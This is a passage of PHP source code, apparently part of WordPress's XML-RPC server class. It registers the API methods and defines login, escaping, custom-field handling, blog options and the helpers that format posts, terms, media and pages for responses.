* @see IXR_Server
*/
#[AllowDynamicProperties]
class wp_xmlrpc_server extends IXR_Server {
/**
* Methods.
*
* @var array
*/
public $methods;
/**
* Blog options.
*
* @var array
*/
public $blog_options;
/**
* IXR_Error instance.
*
* @var IXR_Error
*/
public $error;
/**
* Flags that the user authentication has failed in this instance of wp_xmlrpc_server.
*
* @var bool
*/
protected $auth_failed = false;
/**
* Flags that XML-RPC is enabled
*
* @var bool
*/
private $is_enabled;
/**
* Registers all of the XMLRPC methods that XMLRPC server understands.
*
* Sets up server and method property. Passes XMLRPC methods through the
* {@see 'xmlrpc_methods'} filter to allow plugins to extend or replace
* XML-RPC methods.
*
* @since 1.5.0
*/
public function __construct() {
$this->methods = array(
// WordPress API.
'wp.getUsersBlogs' => 'this:wp_getUsersBlogs',
'wp.newPost' => 'this:wp_newPost',
'wp.editPost' => 'this:wp_editPost',
'wp.deletePost' => 'this:wp_deletePost',
'wp.getPost' => 'this:wp_getPost',
'wp.getPosts' => 'this:wp_getPosts',
'wp.newTerm' => 'this:wp_newTerm',
'wp.editTerm' => 'this:wp_editTerm',
'wp.deleteTerm' => 'this:wp_deleteTerm',
'wp.getTerm' => 'this:wp_getTerm',
'wp.getTerms' => 'this:wp_getTerms',
'wp.getTaxonomy' => 'this:wp_getTaxonomy',
'wp.getTaxonomies' => 'this:wp_getTaxonomies',
'wp.getUser' => 'this:wp_getUser',
'wp.getUsers' => 'this:wp_getUsers',
'wp.getProfile' => 'this:wp_getProfile',
'wp.editProfile' => 'this:wp_editProfile',
'wp.getPage' => 'this:wp_getPage',
'wp.getPages' => 'this:wp_getPages',
'wp.newPage' => 'this:wp_newPage',
'wp.deletePage' => 'this:wp_deletePage',
'wp.editPage' => 'this:wp_editPage',
'wp.getPageList' => 'this:wp_getPageList',
'wp.getAuthors' => 'this:wp_getAuthors',
'wp.getCategories' => 'this:mw_getCategories', // Alias.
'wp.getTags' => 'this:wp_getTags',
'wp.newCategory' => 'this:wp_newCategory',
'wp.deleteCategory' => 'this:wp_deleteCategory',
'wp.suggestCategories' => 'this:wp_suggestCategories',
'wp.uploadFile' => 'this:mw_newMediaObject', // Alias.
'wp.deleteFile' => 'this:wp_deletePost', // Alias.
'wp.getCommentCount' => 'this:wp_getCommentCount',
'wp.getPostStatusList' => 'this:wp_getPostStatusList',
'wp.getPageStatusList' => 'this:wp_getPageStatusList',
'wp.getPageTemplates' => 'this:wp_getPageTemplates',
'wp.getOptions' => 'this:wp_getOptions',
'wp.setOptions' => 'this:wp_setOptions',
'wp.getComment' => 'this:wp_getComment',
'wp.getComments' => 'this:wp_getComments',
'wp.deleteComment' => 'this:wp_deleteComment',
'wp.editComment' => 'this:wp_editComment',
'wp.newComment' => 'this:wp_newComment',
'wp.getCommentStatusList' => 'this:wp_getCommentStatusList',
'wp.getMediaItem' => 'this:wp_getMediaItem',
'wp.getMediaLibrary' => 'this:wp_getMediaLibrary',
'wp.getPostFormats' => 'this:wp_getPostFormats',
'wp.getPostType' => 'this:wp_getPostType',
'wp.getPostTypes' => 'this:wp_getPostTypes',
'wp.getRevisions' => 'this:wp_getRevisions',
'wp.restoreRevision' => 'this:wp_restoreRevision',
// Blogger API.
'blogger.getUsersBlogs' => 'this:blogger_getUsersBlogs',
'blogger.getUserInfo' => 'this:blogger_getUserInfo',
'blogger.getPost' => 'this:blogger_getPost',
'blogger.getRecentPosts' => 'this:blogger_getRecentPosts',
'blogger.newPost' => 'this:blogger_newPost',
'blogger.editPost' => 'this:blogger_editPost',
'blogger.deletePost' => 'this:blogger_deletePost',
// MetaWeblog API (with MT extensions to structs).
'metaWeblog.newPost' => 'this:mw_newPost',
'metaWeblog.editPost' => 'this:mw_editPost',
'metaWeblog.getPost' => 'this:mw_getPost',
'metaWeblog.getRecentPosts' => 'this:mw_getRecentPosts',
'metaWeblog.getCategories' => 'this:mw_getCategories',
'metaWeblog.newMediaObject' => 'this:mw_newMediaObject',
/*
* MetaWeblog API aliases for Blogger API.
* See http://www.xmlrpc.com/stories/storyReader$2460
*/
'metaWeblog.deletePost' => 'this:blogger_deletePost',
'metaWeblog.getUsersBlogs' => 'this:blogger_getUsersBlogs',
// MovableType API.
'mt.getCategoryList' => 'this:mt_getCategoryList',
'mt.getRecentPostTitles' => 'this:mt_getRecentPostTitles',
'mt.getPostCategories' => 'this:mt_getPostCategories',
'mt.setPostCategories' => 'this:mt_setPostCategories',
'mt.supportedMethods' => 'this:mt_supportedMethods',
'mt.supportedTextFilters' => 'this:mt_supportedTextFilters',
'mt.getTrackbackPings' => 'this:mt_getTrackbackPings',
'mt.publishPost' => 'this:mt_publishPost',
// Pingback.
'pingback.ping' => 'this:pingback_ping',
'pingback.extensions.getPingbacks' => 'this:pingback_extensions_getPingbacks',
'demo.sayHello' => 'this:sayHello',
'demo.addTwoNumbers' => 'this:addTwoNumbers',
);
$this->initialise_blog_option_info();
/**
* Filters the methods exposed by the XML-RPC server.
*
* This filter can be used to add new methods, and remove built-in methods.
*
* @since 1.5.0
*
* @param string[] $methods An array of XML-RPC methods, keyed by their methodName.
*/
$this->methods = apply_filters( 'xmlrpc_methods', $this->methods );
$this->set_is_enabled();
}
/**
* Sets wp_xmlrpc_server::$is_enabled property.
*
* Determines whether the xmlrpc server is enabled on this WordPress install
* and set the is_enabled property accordingly.
*
* @since 5.7.3
*/
private function set_is_enabled() {
/*
* Respect old get_option() filters left for back-compat when the 'enable_xmlrpc'
* option was deprecated in 3.5.0. Use the {@see 'xmlrpc_enabled'} hook instead.
*/
$is_enabled = apply_filters( 'pre_option_enable_xmlrpc', false );
if ( false === $is_enabled ) {
$is_enabled = apply_filters( 'option_enable_xmlrpc', true );
}
/**
* Filters whether XML-RPC methods requiring authentication are enabled.
*
* Contrary to the way it's named, this filter does not control whether XML-RPC is *fully*
* enabled, rather, it only controls whether XML-RPC methods requiring authentication -
* such as for publishing purposes - are enabled.
*
* Further, the filter does not control whether pingbacks or other custom endpoints that don't
* require authentication are enabled. This behavior is expected, and due to how parity was matched
* with the `enable_xmlrpc` UI option the filter replaced when it was introduced in 3.5.
*
* To disable XML-RPC methods that require authentication, use:
*
* add_filter( 'xmlrpc_enabled', '__return_false' );
*
* For more granular control over all XML-RPC methods and requests, see the {@see 'xmlrpc_methods'}
* and {@see 'xmlrpc_element_limit'} hooks.
*
* @since 3.5.0
*
* @param bool $is_enabled Whether XML-RPC is enabled. Default true.
*/
$this->is_enabled = apply_filters( 'xmlrpc_enabled', $is_enabled );
}
/**
* Makes private/protected methods readable for backward compatibility.
*
* @since 4.0.0
*
* @param string $name Method to call.
* @param array $arguments Arguments to pass when calling.
* @return array|IXR_Error|false Return value of the callback, false otherwise.
*/
public function __call( $name, $arguments ) {
if ( '_multisite_getUsersBlogs' === $name ) {
return $this->_multisite_getUsersBlogs( ...$arguments );
}
return false;
}
/**
* Serves the XML-RPC request.
*
* @since 2.9.0
*/
public function serve_request() {
$this->IXR_Server( $this->methods );
}
/**
* Tests XMLRPC API by saying, "Hello!" to client.
*
* @since 1.5.0
*
* @return string Hello string response.
*/
public function sayHello() {
return 'Hello!';
}
/**
* Tests XMLRPC API by adding two numbers for client.
*
* @since 1.5.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 A number to add.
* @type int $1 A second number to add.
* }
* @return int Sum of the two given numbers.
*/
public function addTwoNumbers( $args ) {
$number1 = $args[0];
$number2 = $args[1];
return $number1 + $number2;
}
/**
* Logs user in.
*
* @since 2.8.0
*
* @param string $username User's username.
* @param string $password User's password.
* @return WP_User|false WP_User object if authentication passed, false otherwise.
*/
public function login(
$username,
#[\SensitiveParameter]
$password
) {
if ( ! $this->is_enabled ) {
$this->error = new IXR_Error( 405, sprintf( __( 'XML-RPC services are disabled on this site.' ) ) );
return false;
}
if ( $this->auth_failed ) {
$user = new WP_Error( 'login_prevented' );
} else {
$user = wp_authenticate( $username, $password );
}
if ( is_wp_error( $user ) ) {
$this->error = new IXR_Error( 403, __( 'Incorrect username or password.' ) );
// Flag that authentication has failed once on this wp_xmlrpc_server instance.
$this->auth_failed = true;
/**
* Filters the XML-RPC user login error message.
*
* @since 3.5.0
*
* @param IXR_Error $error The XML-RPC error message.
* @param WP_Error $user WP_Error object.
*/
$this->error = apply_filters( 'xmlrpc_login_error', $this->error, $user );
return false;
}
wp_set_current_user( $user->ID );
return $user;
}
/**
* Checks user's credentials. Deprecated.
*
* @since 1.5.0
* @deprecated 2.8.0 Use wp_xmlrpc_server::login()
* @see wp_xmlrpc_server::login()
*
* @param string $username User's username.
* @param string $password User's password.
* @return bool Whether authentication passed.
*/
public function login_pass_ok(
$username,
#[\SensitiveParameter]
$password
) {
return (bool) $this->login( $username, $password );
}
/**
* Escapes string or array of strings for database.
*
* @since 1.5.2
*
* @param string|array $data Escape single string or array of strings.
* @return string|void Returns with string is passed, alters by-reference
* when array is passed.
*/
public function escape( &$data ) {
if ( ! is_array( $data ) ) {
return wp_slash( $data );
}
foreach ( $data as &$v ) {
if ( is_array( $v ) ) {
$this->escape( $v );
} elseif ( ! is_object( $v ) ) {
$v = wp_slash( $v );
}
}
}
/**
* Sends error response to client.
*
* Sends an XML error response to the client. If the endpoint is enabled
* an HTTP 200 response is always sent per the XML-RPC specification.
*
* @since 5.7.3
*
* @param IXR_Error|string $error Error code or an error object.
* @param false $message Error message. Optional.
*/
public function error( $error, $message = false ) {
// Accepts either an error object or an error code and message
if ( $message && ! is_object( $error ) ) {
$error = new IXR_Error( $error, $message );
}
if ( ! $this->is_enabled ) {
status_header( $error->code );
}
$this->output( $error->getXml() );
}
/**
* Retrieves custom fields for post.
*
* @since 2.5.0
*
* @param int $post_id Post ID.
* @return array Custom fields, if exist.
*/
public function get_custom_fields( $post_id ) {
$post_id = (int) $post_id;
$custom_fields = array();
foreach ( (array) has_meta( $post_id ) as $meta ) {
// Don't expose protected fields.
if ( ! current_user_can( 'edit_post_meta', $post_id, $meta['meta_key'] ) ) {
continue;
}
$custom_fields[] = array(
'id' => $meta['meta_id'],
'key' => $meta['meta_key'],
'value' => $meta['meta_value'],
);
}
return $custom_fields;
}
/**
* Sets custom fields for post.
*
* @since 2.5.0
*
* @param int $post_id Post ID.
* @param array $fields Custom fields.
*/
public function set_custom_fields( $post_id, $fields ) {
$post_id = (int) $post_id;
foreach ( (array) $fields as $meta ) {
if ( isset( $meta['id'] ) ) {
$meta['id'] = (int) $meta['id'];
$pmeta = get_metadata_by_mid( 'post', $meta['id'] );
if ( ! $pmeta || (int) $pmeta->post_id !== $post_id ) {
continue;
}
if ( isset( $meta['key'] ) ) {
$meta['key'] = wp_unslash( $meta['key'] );
if ( $meta['key'] !== $pmeta->meta_key ) {
continue;
}
$meta['value'] = wp_unslash( $meta['value'] );
if ( current_user_can( 'edit_post_meta', $post_id, $meta['key'] ) ) {
update_metadata_by_mid( 'post', $meta['id'], $meta['value'] );
}
} elseif ( current_user_can( 'delete_post_meta', $post_id, $pmeta->meta_key ) ) {
delete_metadata_by_mid( 'post', $meta['id'] );
}
} elseif ( current_user_can( 'add_post_meta', $post_id, wp_unslash( $meta['key'] ) ) ) {
add_post_meta( $post_id, $meta['key'], $meta['value'] );
}
}
}
/**
* Retrieves custom fields for a term.
*
* @since 4.9.0
*
* @param int $term_id Term ID.
* @return array Array of custom fields, if they exist.
*/
public function get_term_custom_fields( $term_id ) {
$term_id = (int) $term_id;
$custom_fields = array();
foreach ( (array) has_term_meta( $term_id ) as $meta ) {
if ( ! current_user_can( 'edit_term_meta', $term_id ) ) {
continue;
}
$custom_fields[] = array(
'id' => $meta['meta_id'],
'key' => $meta['meta_key'],
'value' => $meta['meta_value'],
);
}
return $custom_fields;
}
/**
* Sets custom fields for a term.
*
* @since 4.9.0
*
* @param int $term_id Term ID.
* @param array $fields Custom fields.
*/
public function set_term_custom_fields( $term_id, $fields ) {
$term_id = (int) $term_id;
foreach ( (array) $fields as $meta ) {
if ( isset( $meta['id'] ) ) {
$meta['id'] = (int) $meta['id'];
$pmeta = get_metadata_by_mid( 'term', $meta['id'] );
if ( isset( $meta['key'] ) ) {
$meta['key'] = wp_unslash( $meta['key'] );
if ( $meta['key'] !== $pmeta->meta_key ) {
continue;
}
$meta['value'] = wp_unslash( $meta['value'] );
if ( current_user_can( 'edit_term_meta', $term_id ) ) {
update_metadata_by_mid( 'term', $meta['id'], $meta['value'] );
}
} elseif ( current_user_can( 'delete_term_meta', $term_id ) ) {
delete_metadata_by_mid( 'term', $meta['id'] );
}
} elseif ( current_user_can( 'add_term_meta', $term_id ) ) {
add_term_meta( $term_id, $meta['key'], $meta['value'] );
}
}
}
/**
* Sets up blog options property.
*
* Passes property through {@see 'xmlrpc_blog_options'} filter.
*
* @since 2.6.0
*/
public function initialise_blog_option_info() {
$this->blog_options = array(
// Read-only options.
'software_name' => array(
'desc' => __( 'Software Name' ),
'readonly' => true,
'value' => 'WordPress',
),
'software_version' => array(
'desc' => __( 'Software Version' ),
'readonly' => true,
'value' => get_bloginfo( 'version' ),
),
'blog_url' => array(
'desc' => __( 'WordPress Address (URL)' ),
'readonly' => true,
'option' => 'siteurl',
),
'home_url' => array(
'desc' => __( 'Site Address (URL)' ),
'readonly' => true,
'option' => 'home',
),
'login_url' => array(
'desc' => __( 'Login Address (URL)' ),
'readonly' => true,
'value' => wp_login_url(),
),
'admin_url' => array(
'desc' => __( 'The URL to the admin area' ),
'readonly' => true,
'value' => get_admin_url(),
),
'image_default_link_type' => array(
'desc' => __( 'Image default link type' ),
'readonly' => true,
'option' => 'image_default_link_type',
),
'image_default_size' => array(
'desc' => __( 'Image default size' ),
'readonly' => true,
'option' => 'image_default_size',
),
'image_default_align' => array(
'desc' => __( 'Image default align' ),
'readonly' => true,
'option' => 'image_default_align',
),
'template' => array(
'desc' => __( 'Template' ),
'readonly' => true,
'option' => 'template',
),
'stylesheet' => array(
'desc' => __( 'Stylesheet' ),
'readonly' => true,
'option' => 'stylesheet',
),
'post_thumbnail' => array(
'desc' => __( 'Post Thumbnail' ),
'readonly' => true,
'value' => current_theme_supports( 'post-thumbnails' ),
),
// Updatable options.
'time_zone' => array(
'desc' => __( 'Time Zone' ),
'readonly' => false,
'option' => 'gmt_offset',
),
'blog_title' => array(
'desc' => __( 'Site Title' ),
'readonly' => false,
'option' => 'blogname',
),
'blog_tagline' => array(
'desc' => __( 'Site Tagline' ),
'readonly' => false,
'option' => 'blogdescription',
),
'date_format' => array(
'desc' => __( 'Date Format' ),
'readonly' => false,
'option' => 'date_format',
),
'time_format' => array(
'desc' => __( 'Time Format' ),
'readonly' => false,
'option' => 'time_format',
),
'users_can_register' => array(
'desc' => __( 'Allow new users to sign up' ),
'readonly' => false,
'option' => 'users_can_register',
),
'thumbnail_size_w' => array(
'desc' => __( 'Thumbnail Width' ),
'readonly' => false,
'option' => 'thumbnail_size_w',
),
'thumbnail_size_h' => array(
'desc' => __( 'Thumbnail Height' ),
'readonly' => false,
'option' => 'thumbnail_size_h',
),
'thumbnail_crop' => array(
'desc' => __( 'Crop thumbnail to exact dimensions' ),
'readonly' => false,
'option' => 'thumbnail_crop',
),
'medium_size_w' => array(
'desc' => __( 'Medium size image width' ),
'readonly' => false,
'option' => 'medium_size_w',
),
'medium_size_h' => array(
'desc' => __( 'Medium size image height' ),
'readonly' => false,
'option' => 'medium_size_h',
),
'medium_large_size_w' => array(
'desc' => __( 'Medium-Large size image width' ),
'readonly' => false,
'option' => 'medium_large_size_w',
),
'medium_large_size_h' => array(
'desc' => __( 'Medium-Large size image height' ),
'readonly' => false,
'option' => 'medium_large_size_h',
),
'large_size_w' => array(
'desc' => __( 'Large size image width' ),
'readonly' => false,
'option' => 'large_size_w',
),
'large_size_h' => array(
'desc' => __( 'Large size image height' ),
'readonly' => false,
'option' => 'large_size_h',
),
'default_comment_status' => array(
'desc' => __( 'Allow people to submit comments on new posts.' ),
'readonly' => false,
'option' => 'default_comment_status',
),
'default_ping_status' => array(
'desc' => __( 'Allow link notifications from other blogs (pingbacks and trackbacks) on new posts.' ),
'readonly' => false,
'option' => 'default_ping_status',
),
);
/**
* Filters the XML-RPC blog options property.
*
* @since 2.6.0
*
* @param array $blog_options An array of XML-RPC blog options.
*/
$this->blog_options = apply_filters( 'xmlrpc_blog_options', $this->blog_options );
}
/**
* Retrieves the blogs of the user.
*
* @since 2.6.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type string $0 Username.
* @type string $1 Password.
* }
* @return array|IXR_Error Array contains:
* - 'isAdmin'
* - 'isPrimary' - whether the blog is the user's primary blog
* - 'url'
* - 'blogid'
* - 'blogName'
* - 'xmlrpc' - url of xmlrpc endpoint
*/
public function wp_getUsersBlogs( $args ) {
if ( ! $this->minimum_args( $args, 2 ) ) {
return $this->error;
}
// If this isn't on WPMU then just use blogger_getUsersBlogs().
if ( ! is_multisite() ) {
array_unshift( $args, 1 );
return $this->blogger_getUsersBlogs( $args );
}
$this->escape( $args );
$username = $args[0];
$password = $args[1];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/**
* Fires after the XML-RPC user has been authenticated but before the rest of
* the method logic begins.
*
* All built-in XML-RPC methods use the action xmlrpc_call, with a parameter
* equal to the method's name, e.g., wp.getUsersBlogs, wp.newPost, etc.
*
* @since 2.5.0
* @since 5.7.0 Added the `$args` and `$server` parameters.
*
* @param string $name The method name.
* @param array|string $args The escaped arguments passed to the method.
* @param wp_xmlrpc_server $server The XML-RPC server instance.
*/
do_action( 'xmlrpc_call', 'wp.getUsersBlogs', $args, $this );
$blogs = (array) get_blogs_of_user( $user->ID );
$struct = array();
$primary_blog_id = 0;
$active_blog = get_active_blog_for_user( $user->ID );
if ( $active_blog ) {
$primary_blog_id = (int) $active_blog->blog_id;
}
$current_network_id = get_current_network_id();
foreach ( $blogs as $blog ) {
// Don't include blogs that aren't hosted at this site.
if ( $blog->site_id !== $current_network_id ) {
continue;
}
$blog_id = $blog->userblog_id;
switch_to_blog( $blog_id );
$is_admin = current_user_can( 'manage_options' );
$is_primary = ( (int) $blog_id === $primary_blog_id );
$struct[] = array(
'isAdmin' => $is_admin,
'isPrimary' => $is_primary,
'url' => home_url( '/' ),
'blogid' => (string) $blog_id,
'blogName' => get_option( 'blogname' ),
'xmlrpc' => site_url( 'xmlrpc.php', 'rpc' ),
);
restore_current_blog();
}
return $struct;
}
/**
* Checks if the method received at least the minimum number of arguments.
*
* @since 3.4.0
*
* @param array $args An array of arguments to check.
* @param int $count Minimum number of arguments.
* @return bool True if `$args` contains at least `$count` arguments, false otherwise.
*/
protected function minimum_args( $args, $count ) {
if ( ! is_array( $args ) || count( $args ) < $count ) {
$this->error = new IXR_Error( 400, __( 'Insufficient arguments passed to this XML-RPC method.' ) );
return false;
}
return true;
}
/**
* Prepares taxonomy data for return in an XML-RPC object.
*
* @param WP_Taxonomy $taxonomy The unprepared taxonomy data.
* @param array $fields The subset of taxonomy fields to return.
* @return array The prepared taxonomy data.
*/
protected function _prepare_taxonomy( $taxonomy, $fields ) {
$_taxonomy = array(
'name' => $taxonomy->name,
'label' => $taxonomy->label,
'hierarchical' => (bool) $taxonomy->hierarchical,
'public' => (bool) $taxonomy->public,
'show_ui' => (bool) $taxonomy->show_ui,
'_builtin' => (bool) $taxonomy->_builtin,
);
if ( in_array( 'labels', $fields, true ) ) {
$_taxonomy['labels'] = (array) $taxonomy->labels;
}
if ( in_array( 'cap', $fields, true ) ) {
$_taxonomy['cap'] = (array) $taxonomy->cap;
}
if ( in_array( 'menu', $fields, true ) ) {
$_taxonomy['show_in_menu'] = (bool) $taxonomy->show_in_menu;
}
if ( in_array( 'object_type', $fields, true ) ) {
$_taxonomy['object_type'] = array_unique( (array) $taxonomy->object_type );
}
/**
* Filters XML-RPC-prepared data for the given taxonomy.
*
* @since 3.4.0
*
* @param array $_taxonomy An array of taxonomy data.
* @param WP_Taxonomy $taxonomy Taxonomy object.
* @param array $fields The subset of taxonomy fields to return.
*/
return apply_filters( 'xmlrpc_prepare_taxonomy', $_taxonomy, $taxonomy, $fields );
}
/**
* Prepares term data for return in an XML-RPC object.
*
* @param array|object $term The unprepared term data.
* @return array The prepared term data.
*/
protected function _prepare_term( $term ) {
$_term = $term;
if ( ! is_array( $_term ) ) {
$_term = get_object_vars( $_term );
}
// For integers which may be larger than XML-RPC supports ensure we return strings.
$_term['term_id'] = (string) $_term['term_id'];
$_term['term_group'] = (string) $_term['term_group'];
$_term['term_taxonomy_id'] = (string) $_term['term_taxonomy_id'];
$_term['parent'] = (string) $_term['parent'];
// Count we are happy to return as an integer because people really shouldn't use terms that much.
$_term['count'] = (int) $_term['count'];
// Get term meta.
$_term['custom_fields'] = $this->get_term_custom_fields( $_term['term_id'] );
/**
* Filters XML-RPC-prepared data for the given term.
*
* @since 3.4.0
*
* @param array $_term An array of term data.
* @param array|object $term Term object or array.
*/
return apply_filters( 'xmlrpc_prepare_term', $_term, $term );
}
/**
* Converts a WordPress date string to an IXR_Date object.
*
* @param string $date Date string to convert.
* @return IXR_Date IXR_Date object.
*/
protected function _convert_date( $date ) {
if ( '0000-00-00 00:00:00' === $date ) {
return new IXR_Date( '00000000T00:00:00Z' );
}
return new IXR_Date( mysql2date( 'Ymd\TH:i:s', $date, false ) );
}
/**
* Converts a WordPress GMT date string to an IXR_Date object.
*
* @param string $date_gmt WordPress GMT date string.
* @param string $date Date string.
* @return IXR_Date IXR_Date object.
*/
protected function _convert_date_gmt( $date_gmt, $date ) {
if ( '0000-00-00 00:00:00' !== $date && '0000-00-00 00:00:00' === $date_gmt ) {
return new IXR_Date( get_gmt_from_date( mysql2date( 'Y-m-d H:i:s', $date, false ), 'Ymd\TH:i:s' ) );
}
return $this->_convert_date( $date_gmt );
}
/**
* Prepares post data for return in an XML-RPC object.
*
* @param array $post The unprepared post data.
* @param array $fields The subset of post type fields to return.
* @return array The prepared post data.
*/
protected function _prepare_post( $post, $fields ) {
// Holds the data for this post. built up based on $fields.
$_post = array( 'post_id' => (string) $post['ID'] );
// Prepare common post fields.
$post_fields = array(
'post_title' => $post['post_title'],
'post_date' => $this->_convert_date( $post['post_date'] ),
'post_date_gmt' => $this->_convert_date_gmt( $post['post_date_gmt'], $post['post_date'] ),
'post_modified' => $this->_convert_date( $post['post_modified'] ),
'post_modified_gmt' => $this->_convert_date_gmt( $post['post_modified_gmt'], $post['post_modified'] ),
'post_status' => $post['post_status'],
'post_type' => $post['post_type'],
'post_name' => $post['post_name'],
'post_author' => $post['post_author'],
'post_password' => $post['post_password'],
'post_excerpt' => $post['post_excerpt'],
'post_content' => $post['post_content'],
'post_parent' => (string) $post['post_parent'],
'post_mime_type' => $post['post_mime_type'],
'link' => get_permalink( $post['ID'] ),
'guid' => $post['guid'],
'menu_order' => (int) $post['menu_order'],
'comment_status' => $post['comment_status'],
'ping_status' => $post['ping_status'],
'sticky' => ( 'post' === $post['post_type'] && is_sticky( $post['ID'] ) ),
);
// Thumbnail.
$post_fields['post_thumbnail'] = array();
$thumbnail_id = get_post_thumbnail_id( $post['ID'] );
if ( $thumbnail_id ) {
$thumbnail_size = current_theme_supports( 'post-thumbnail' ) ? 'post-thumbnail' : 'thumbnail';
$post_fields['post_thumbnail'] = $this->_prepare_media_item( get_post( $thumbnail_id ), $thumbnail_size );
}
// Consider future posts as published.
if ( 'future' === $post_fields['post_status'] ) {
$post_fields['post_status'] = 'publish';
}
// Fill in blank post format.
$post_fields['post_format'] = get_post_format( $post['ID'] );
if ( empty( $post_fields['post_format'] ) ) {
$post_fields['post_format'] = 'standard';
}
// Merge requested $post_fields fields into $_post.
if ( in_array( 'post', $fields, true ) ) {
$_post = array_merge( $_post, $post_fields );
} else {
$requested_fields = array_intersect_key( $post_fields, array_flip( $fields ) );
$_post = array_merge( $_post, $requested_fields );
}
$all_taxonomy_fields = in_array( 'taxonomies', $fields, true );
if ( $all_taxonomy_fields || in_array( 'terms', $fields, true ) ) {
$post_type_taxonomies = get_object_taxonomies( $post['post_type'], 'names' );
$terms = wp_get_object_terms( $post['ID'], $post_type_taxonomies );
$_post['terms'] = array();
foreach ( $terms as $term ) {
$_post['terms'][] = $this->_prepare_term( $term );
}
}
if ( in_array( 'custom_fields', $fields, true ) ) {
$_post['custom_fields'] = $this->get_custom_fields( $post['ID'] );
}
if ( in_array( 'enclosure', $fields, true ) ) {
$_post['enclosure'] = array();
$enclosures = (array) get_post_meta( $post['ID'], 'enclosure' );
if ( ! empty( $enclosures ) ) {
$encdata = explode( "\n", $enclosures[0] );
$_post['enclosure']['url'] = trim( htmlspecialchars( $encdata[0] ) );
$_post['enclosure']['length'] = (int) trim( $encdata[1] );
$_post['enclosure']['type'] = trim( $encdata[2] );
}
}
/**
* Filters XML-RPC-prepared date for the given post.
*
* @since 3.4.0
*
* @param array $_post An array of modified post data.
* @param array $post An array of post data.
* @param array $fields An array of post fields.
*/
return apply_filters( 'xmlrpc_prepare_post', $_post, $post, $fields );
}
/**
* Prepares post data for return in an XML-RPC object.
*
* @since 3.4.0
* @since 4.6.0 Converted the `$post_type` parameter to accept a WP_Post_Type object.
*
* @param WP_Post_Type $post_type Post type object.
* @param array $fields The subset of post fields to return.
* @return array The prepared post type data.
*/
protected function _prepare_post_type( $post_type, $fields ) {
$_post_type = array(
'name' => $post_type->name,
'label' => $post_type->label,
'hierarchical' => (bool) $post_type->hierarchical,
'public' => (bool) $post_type->public,
'show_ui' => (bool) $post_type->show_ui,
'_builtin' => (bool) $post_type->_builtin,
'has_archive' => (bool) $post_type->has_archive,
'supports' => get_all_post_type_supports( $post_type->name ),
);
if ( in_array( 'labels', $fields, true ) ) {
$_post_type['labels'] = (array) $post_type->labels;
}
if ( in_array( 'cap', $fields, true ) ) {
$_post_type['cap'] = (array) $post_type->cap;
$_post_type['map_meta_cap'] = (bool) $post_type->map_meta_cap;
}
if ( in_array( 'menu', $fields, true ) ) {
$_post_type['menu_position'] = (int) $post_type->menu_position;
$_post_type['menu_icon'] = $post_type->menu_icon;
$_post_type['show_in_menu'] = (bool) $post_type->show_in_menu;
}
if ( in_array( 'taxonomies', $fields, true ) ) {
$_post_type['taxonomies'] = get_object_taxonomies( $post_type->name, 'names' );
}
/**
* Filters XML-RPC-prepared date for the given post type.
*
* @since 3.4.0
* @since 4.6.0 Converted the `$post_type` parameter to accept a WP_Post_Type object.
*
* @param array $_post_type An array of post type data.
* @param WP_Post_Type $post_type Post type object.
*/
return apply_filters( 'xmlrpc_prepare_post_type', $_post_type, $post_type );
}
/**
* Prepares media item data for return in an XML-RPC object.
*
* @param WP_Post $media_item The unprepared media item data.
* @param string $thumbnail_size The image size to use for the thumbnail URL.
* @return array The prepared media item data.
*/
protected function _prepare_media_item( $media_item, $thumbnail_size = 'thumbnail' ) {
$_media_item = array(
'attachment_id' => (string) $media_item->ID,
'date_created_gmt' => $this->_convert_date_gmt( $media_item->post_date_gmt, $media_item->post_date ),
'parent' => $media_item->post_parent,
'link' => wp_get_attachment_url( $media_item->ID ),
'title' => $media_item->post_title,
'caption' => $media_item->post_excerpt,
'description' => $media_item->post_content,
'metadata' => wp_get_attachment_metadata( $media_item->ID ),
'type' => $media_item->post_mime_type,
'alt' => get_post_meta( $media_item->ID, '_wp_attachment_image_alt', true ),
);
$thumbnail_src = image_downsize( $media_item->ID, $thumbnail_size );
if ( $thumbnail_src ) {
$_media_item['thumbnail'] = $thumbnail_src[0];
} else {
$_media_item['thumbnail'] = $_media_item['link'];
}
/**
* Filters XML-RPC-prepared data for the given media item.
*
* @since 3.4.0
*
* @param array $_media_item An array of media item data.
* @param WP_Post $media_item Media item object.
* @param string $thumbnail_size Image size.
*/
return apply_filters( 'xmlrpc_prepare_media_item', $_media_item, $media_item, $thumbnail_size );
}
/**
* Prepares page data for return in an XML-RPC object.
*
* @param WP_Post $page The unprepared page data.
* @return array The prepared page data.
*/
protected function _prepare_page( $page ) {
// Get all of the page content and link.
$full_page = get_extended( $page->post_content );
$link = get_permalink( $page->ID );
// Get info the page parent if there is one.
$parent_title = '';
if ( ! empty( $page->post_parent ) ) {
$parent = get_post( $page->post_parent );
$parent_title = $parent->post_title;
}
// Determine comment and ping settings.
$allow_comments = comments_open( $page->ID ) ? 1 : 0;
$allow_pings = pings_open( $page->ID ) ? 1 : 0;
// Format page date.
$page_date = $this->_convert_date( $page->post_date );
$page_date_gmt = $this->_convert_date_gmt( $page->post_date_gmt, $page->post_date );
// Pull the categories info together.
$categories = array();
if ( is_object_in_taxonomy( 'page', 'category' ) ) {
foreach ( wp_get_post_categories( $page->ID ) as $cat_id ) {
$categories[] = get_cat_name( $cat_id );
}
}
// Get the author info.
$author = get_userdata( $page->post_author );
$page_template = get_page_template_slug( $page->ID );
if ( empty( $page_template ) ) {
$page_template = 'default';
}
$_page = array(
'dateCreated' => $page_date,
'userid' => $page->post_author,
'page_id' => $page->ID,
'page_status' => $page->post_status,
'description' => $full_page['main'],
'title' => $page->post_title,
'link' => $link,
'permaLink' => $link,
'categories' => $categories,
'excerpt' => $page->post_excerpt,
'text_more' => $full_page['extended'],
'mt_allow_comments' => $allow_comments,
'mt_allow_pings' => $allow_pings,
'wp_slug' => $page->post_name,
'wp_password' => $page->post_password,
'wp_author' => $author->display_name,
'wp_page_parent_id' => $page->post_parent,
'wp_page_parent_title' => $parent_title,
'wp_page_order' => $page->menu_order,
'wp_author_id' => (string) $author->ID,
'wp_author_display_name' => $author->display_name,
'date_created_gmt' => $page_date_gmt,
'custom_fields' => $this->get_custom_fields( $page->ID ),
'wp_page_template' => $page_template,
);
/**
* Filters XML-RPC-prepared data for the given page.
*
* @since 3.4.0
*
* @param array $_page An array of page data.
* @param WP_Post $page Page object.
*/
return apply_filters( 'xmlrpc_prepare_page', $_page, $page );
